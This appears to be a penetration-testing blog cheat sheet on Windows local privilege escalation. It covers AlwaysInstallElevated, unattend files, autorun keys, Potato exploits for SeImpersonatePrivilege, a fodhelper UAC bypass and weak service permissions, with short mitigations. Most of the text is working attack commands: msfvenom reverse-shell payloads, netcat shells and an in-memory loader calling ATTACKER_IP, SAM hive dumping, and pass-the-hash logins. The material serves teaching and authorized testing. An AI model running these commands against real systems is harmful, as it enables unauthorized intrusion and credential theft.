Post

Windows Local Privilege Escalation

Posted
Preview Image
By
7 min read
Windows Local Privilege Escalation

🛠️ Under Constructions

Useful Tools

In the following table, some popular and useful tools for Windows local privilege escalation are presented:

NameLanguageAuthorDescription
SharpUpC#@harmj0ySharpUp is a C# port of various PowerUp functionality
PowerUpPowerShell@harmj0yPowerUp aims to be a clearinghouse of common Windows privilege escalation
PrivescPowerShellenjoizWindows PowerShell script that finds misconfiguration issues which can lead to privilege escalation
WinpeasC#@hacktricks_liveWindows local Privilege Escalation Awesome Script
PrivescCheckPowerShell@itm4nPrivilege Escalation Enumeration Script for Windows

AlwaysInstallElevated

Manual Enumeration

1
2

$ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
$ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Tool Enumeration

1

$ SharpUp.exe audit AlwaysInstallElevated

Exploitation

1

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.15 LPORT=9001 -f msi > backdoor.msi

1
2

execute on windows
$ msiexec /quiet /qn /i backdoor.msi

Mitigation

To mitigate the AlwaysInstallElevated vulnerability, it is recommended to set the AlwaysInstallElevated value to 0 in both the HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER hives in the Windows Registry.

Answer files (Unattend files)

Manual Enumeration

1

$ Write-Host `n;foreach ($file in @('C:\Windows\Panther\unattend.xml', 'C:\Windows\Panther\Unattend\unattend.xml', 'C:\Windows\System32\Sysprep\unattend.xml', 'C:\Windows\System32\Sysprep\sysprep.xml', 'C:\Windows\System32\Sysprep\Panther\unattend.xml', 'C:\Windows\sysprep.inf', 'C:\Windows\unattend.xml', 'C:\unattend.xml', 'C:\sysprep.inf')) { if (Test-Path $file) { Write-Host "[+] $file" } }; Write-Host `n

Tool Enumeration

1

$ SharpUp.exe audit UnattendedInstallFiles

Exploitation

1
2
3
4
5

1-  Read the content of the found answer file:
$ type  C:\Windows\Panther\Unattend\Unattend.xml

2- decode the base64 password field
$ echo "<base64 string>" | base64 -d

Leaked Credentials (GitHub Repository)

1

$ git log

Github-Enumeration

1

$ git diff <commit-id-1> <commit-id-2>

Github-Enumeration

1

$ git show

Github-Enumeration

Leaked Credentials (PowerShell History)

1

$ C:\Users\<User>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Mitigation

1

$ Clear-Content -Path "C:\Users\<User>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"

Logon Autostart Execution (Registry Run Keys)

Manual Enumeration

1

$ reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Tool Enumeration

1

$ SharpUp.exe audit RegistryAutoruns

Exploitation

1

$ msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.10.15 lport=9001 -f exe > shell.exe

Rename the malicious exe (shell.exe) to ‘NCV_AMD64.exe’.
Open a listener on your Kali machine.
Reboot the victim’s machine and login as Adminstrator:

Mitigation

1

$ reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "<KeyName>" /f

Logon Autostart Execution (Startup Folder)

1

$ icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

Tool Enumeration

1

$ accesschk.exe /accepteula "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

Exploitation

1

$ msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.10.15 lport=9001 -f exe > shell.exe

Move the malicious executable file to ‘C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup’.
Open a listener on your Kali machine.
Reboot the victim’s machine and login as Adminstrator:

Mitigation

1
2

$ takeown /F "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" /A /R /D Y
$ icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" /reset /T /C /Q

SeBackupPrivilege

Enumeration

1
2

$ whoami /priv
$ SharpUp.exe audit TokenPrivileges

Exploitation

1
2
3
4
5

$ mkdir C:\temp
$ reg save hklm\sam C:\temp\sam.hive
$ reg save hklm\system C:\temp\system.hive
$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL
$ evil-winrm -i <ip> -u "Administrator" -H "<hash>"

SeImpersonatePrivilege

Enumeration

1
2

$ whoami /priv
$ SharpUp.exe audit TokenPrivileges

Exploitation

PrintSpoofer

1

$ PrintSpoofer64.exe -i -c cmd

Potato Family JuicyPotato

JuicyPotatoNG

1
2

JuicyPotatoNG.exe -t * -p C:\windows\system32\cmd.exe -a "/c C:\users\kohsuke\desktop\nc.exe -e cmd.exe 10.10.16.48 9002"

PrintSpoofer

1
2

# can use -i to inject to same process
PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"

RoguePotato

1
2
3
4
5
6
7
8
9
10
11

c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
# In some old versions you need to use the "-f" param
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999

# If outbound 135 is blocked, pivot the OXID resolver via socat on your redirector:
# On attacker redirector (must listen on TCP/135 and forward to victim:9999)
socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999

# On victim, run RoguePotato with local resolver on 9999 and -r pointing to the redirector IP
RoguePotato.exe -r REDIRECTOR_IP -e "cmd.exe /c whoami" -l 9999

SharpEfsPotato

1
2
3
4

SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
# we cat the w.log  
type C:\temp\w.log
nt authority\system

EfsPotato

1
2
3
4
5
6

# output will be nt authority\system
EfsPotato.exe "whoami"

# If one pipe fails or EDR blocks it, try the other supported pipes:
EfsPotato <cmd> [pipe]
	pipe -> lsarpc|efsrpc|samr|lsass|netlogon (default=lsarpc)

GodPotato

1
2
3
4
5

# Works across Windows 8/8.1–11 and Server 2012–2022 when SeImpersonatePrivilege is present.
GodPotato -cmd "cmd /c whoami"
# You can achieve a reverse shell like this.
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"

DCOMPotato

1
2
3
4
5
6

# PrinterNotify variant
PrinterNotifyPotato.exe "cmd /c whoami"

# McpManagementService variant (Server 2022 also)
McpManagementPotato.exe "cmd /c whoami"

SigmaPotato

1
2
3
4
5
6
7

# Load and execute from memory (no disk touch)
[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http://ATTACKER_IP/SigmaPotato.exe"))
[SigmaPotato]::Main("cmd /c whoami")

# Or ask it to spawn a PS reverse shell
[SigmaPotato]::Main(@("--revshell","ATTACKER_IP","4444"))

CLSID Problems

1
2

# Oftentimes default CLSID that JuicyPotato uses doesn't work 
https://ohpe.it/juicy-potato/CLSID/

Checking CLSIDs

1
2
3
4
5
6
7
8
9

# Download Join-Object.ps1 and load it
https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1

# download and execute 
https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1

# trying every CLSID  when the port number changes, it will mean that the CLSID worked.
# Check the working CLSIDs using the parameter -c
https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat

Stored Credentials (Runas)

Enumeration

1

$ cmdkey /list

Exploitaion

1
2
3
4
5

- on attacker:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.15 LPORT=9001 -f exe > mallicous.exe

- on victim:
$ runas /savecred /user:WORKGROUP\Administrator "C:\Windows\Tasks\mallicous.exe"

UAC Bypass

Enumeration

1

$ reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

Tool Enumeration

1

$ SharpUp.exe audit

Exploitation

ℹ️ This case study leverages a UAC384 bypass that abuses the Fodhelper.exe application

1
2
3
4
5
6
7
8

on attacker:
$ msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.10.15 lport=9001 -f exe > mallicous.exe

on victim:
$ New-Item -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Force
$ New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
$ Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Name "(default)" -Value "powershell -exec bypass -c C:\<full_path>\<binary.exe>" -Force
C:\Windows\System32\fodhelper.exe

Unquoted Service Path

Enumeration

1
2
3

$ wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
$ sc qc "Vulnerable Service 1"
$ icacls "C:\Program Files\Vulnerable Service1"

Tool Enumeration

1

$ SharpUp.exe audit UnquotedServicePath

Exploitation

1
2
3
4
5
6
7
8
9

$ sc query "Vulnerable Service 1"

on attacker:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.15 LPORT=9001 -f exe > Service.exe

on victim:
$ iwr -Uri http://<ip>:<port>/Service.exe -Outfile "C:\Program Files\Vulnerable Service1\Service.exe"
$ sc stop "Vulnerable Service 1"
$ sc start "Vulnerable Service 1"

Weak Registry Permissions

Enumeration

1
2

Get-Acl -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4" | fl
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4"

Tool Enumeration

1

SharpUp.exe audit ModifiableServiceRegistryKeys

Exploitation

1
2
3
4
5
6
7
8

on attacker
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.15 LPORT=9001 -f exe > Service4.exe
nc -lnvp 9001

on victim:
iwr -Uri http://<ip>:<port>/Service4.exe -Outfile C:\Windows\Tasks\Service4.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4" /t REG_EXPAND_SZ /v ImagePath /d "C:\Windows\Tasks\Service4.exe" /f
sc start "Vulnerable Service 4"

Mitigation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

Automated Script
# Define the registry key path
$regKey = "HKLM:\SYSTEM\CurrentControlSet\Services\Vulnerable Service 4"

# Get the current ACL (Access Control List) for the registry key
$acl = Get-Acl -Path $regKey

# Specify the account and access rights to be removed
$account = "BUILTIN\Users"
$accessRights = [System.Security.AccessControl.RegistryRights]::FullControl

# Create a new access rule to remove FullControl
$accessRule = New-Object System.Security.AccessControl.RegistryAccessRule($account, $accessRights, "Deny")

# Remove the access rule from the ACL
$acl.RemoveAccessRule($accessRule)

# Set the modified ACL back to the registry key
Set-Acl -Path $regKey -AclObject $acl

Weak Service Binary Permissions

Enumeration

1

icacls "C:\Program Files\CustomSrv2\Service2.exe"


1

sc qc "Vulnerable Service 2"

Tool Enumeration

1

$ SharpUp.exe audit ModifiableServiceBinaries

Exploitation

1
2
3
4
5
6
7
8

$ sc stop "Vulnerable Service 2"

on attacker:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.15 LPORT=9001 -f exe > Service2.exe

on victim:
$ iwr -Uri http://<ip>:<port>/Service2.exe -Outfile C:\Program Files\CustomSrv2\Service2.exe
$ sc start "Vulnerable Service 2"

Mitigation

1

icacls "C:\Program Files\CustomSrv2\Service2.exe" /remove:g BUILTIN\Users:(M)
CheetSheets
Windows LPE
This post is licensed under CC BY 4.0 by the author.